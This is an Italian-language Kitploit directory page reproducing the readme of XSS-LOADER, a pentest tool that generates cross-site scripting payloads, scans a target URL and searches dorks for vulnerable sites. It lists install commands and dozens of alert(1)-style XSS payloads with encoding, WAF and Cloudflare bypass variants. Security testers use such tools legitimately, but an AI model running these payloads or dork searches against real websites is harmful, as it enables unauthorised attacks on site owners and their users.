Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
XSS-LOADER — Generatore di Payload Xss ~ Scanner Xss ~ Cercatore di Dork Xss | Kitploit
Strumenti/GitHubGitHub/capture0x/xss-loader
Scanner di Vulnerabilità WebGenerazione di PayloadSfruttamento di Applicazioni WebBypass WAFPenetration Testing
GitHubcapture0x/xss-loader

XSS-LOADER

Generatore di Payload Xss ~ Scanner Xss ~ Cercatore di Dork Xss

Vedi Repository
62112354 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

💎   STRUMENTI XSS-LOADER   💎

Scritto da TMRSWRR

Versione 1.0.0

Strumenti tutto in uno per XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER

Instagram: TMRSWRR

📷 Screenshot 📷

Scarica lo strumento

👇 💌 Come usare 💌 👇

Come usare

📒 Leggimi 📒

  • Questo strumento crea payload per l'uso nell'iniezione XSS
  • Seleziona i tag payload predefiniti dal parametro o scrivi il tuo payload
  • Effettua l'iniezione XSS con il parametro Xss Scanner
  • Trova gli URL di siti vulnerabili con il parametro Xss Dork Finder

💿 Installazione 💿

Installazione con requirements.txt

root@kitploit:~
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

Utilizzo

root@kitploit:~
python3 payloader.py

🗃️ Caratteristiche 🗃️

*Payload Base

Imposta il parametro predefinito a :<script>alert(1)</script>

*Payload Div

Imposta il parametro predefinito a :<div onpointerover='alert(1)'>MOVE HERE</div

*Payload Img

Imposta il parametro predefinito a :``````

*Payload Body

Imposta il parametro predefinito a :<body ontouchstart=alert(1)>

*Payload Svg

Imposta il parametro predefinito a :<svg onload=alert('1')>

*Inserisci il Tuo Payload

Codifica il payload scritto dall'utente

*Parametro Generatore Payload

Codifica il payload sul tag selezionato

root@kitploit:~
* |   1.  MAIUSCOLO---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  MAIUSCOLO E MINUSCOLO----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  CODIFICA URL ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  CODIFICA ENTITÀ HTML----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  PAYLOAD DIVISO ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  CODIFICA HEX ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  CODIFICA UTF-16 -----> Codifica il payload in formato utf-16.   
* |   8.  CODIFICA UTF-32----->  Codifica il payload in formato utf-32.          
* |   9.  RIMUOVI TAG -----> ";alert('XSS');//            
* |  10.  CODIFICA UNICODE----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  CODIFICA US-ASCII ----->  ¼script¾alert(1)¼/script¾      
* |  12.  CODIFICA BASE64 ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  CODIFICA UTF-7 ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  BYPASS PARENTESI ----->  <script>alert`1`</script>   
* |  15.  CODIFICA UTF-8 ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* |  17.  SCRIPT BREAKOUT----->  </script><script>alert(1)</script>
* |  18.  PAYLOAD CARICAMENTO FILE-----> "><script>alert(1)</script>.gif
* |  19.  BYPASS ALL'INTERNO DEI COMMENTI-----> <!--><script>alert(1)</script>-->
* |  20.  PAYLOAD MUTAZIONE-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  IMG MALFORMA-----> <script>alert(1)</script>">
* |  22.  BYPASS SPAZIO-----> 
* |  23.  BLOCCO DOWNLEVEL-HIDDEN-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  PAYLOAD BYPASS WAF-----> Mostra elenco payload by-pass WAF
* |  25.  PAYLOAD BYPASS CLOUDFLARE-----> Mostra elenco payload by-pass Cloudflare
* |  26.  PAYLOAD POLYGLOT-----> Mostra elenco payload by-pass Polyglot
* |  27.  PAYLOAD ALERT-----> Mostra elenco payload Alert
* |  28.  CREA TUTTI I PAYLOAD-----> Mostra crea tutti i payload
* |  29.  TORNA AL MENU PRINCIPALE
* |  30.  ESCI

*Scanner XSS

Inizialmente dovrai inserire l'URL del target Per favore inserisci l'URL come in questo esempio ==> es. target -----> http://target.com/index.php?name= Selezionato per la scansione dell'elenco payload

  • ELENCO PAYLOAD BASE ==> Elenco payload composto da tag script
  • ELENCO PAYLOAD DIV ==> Elenco payload composto da tag div
  • ELENCO PAYLOAD IMG ==> Elenco payload composto da tag img
  • ELENCO PAYLOAD BODY ==> Elenco payload composto da tag body
  • ELENCO PAYLOAD SVG ==> Elenco payload composto da tag svg
  • ELENCO PAYLOAD MISTO ==> Elenco payload composto da tutti i tag
  • INSERISCI PERCORSO FILE ==> Elenco payload determinato dall'utente, per favore inserisci l'URL come in questo esempio..! (es. percorso -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

I risultati verranno aggiunti in "vulnpayload.txt" dopo la scansione.

*Dork Finder XSS

Prima inserisci il dork per la ricerca: es.---->inurl:"search.php?q=" I risultati verranno salvati in "dork.txt" dopo la scansione.

Problemi noti

Risolti:

  • Errori Unicode

  • Errori di modulo

Importante:

Se vuoi utilizzare lo strumento per python3 installato su Windows, scarica il link qui sotto:

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

Bug e miglioramenti

Per segnalazioni di bug o miglioramenti, apri un issue qui.

Copyright 2020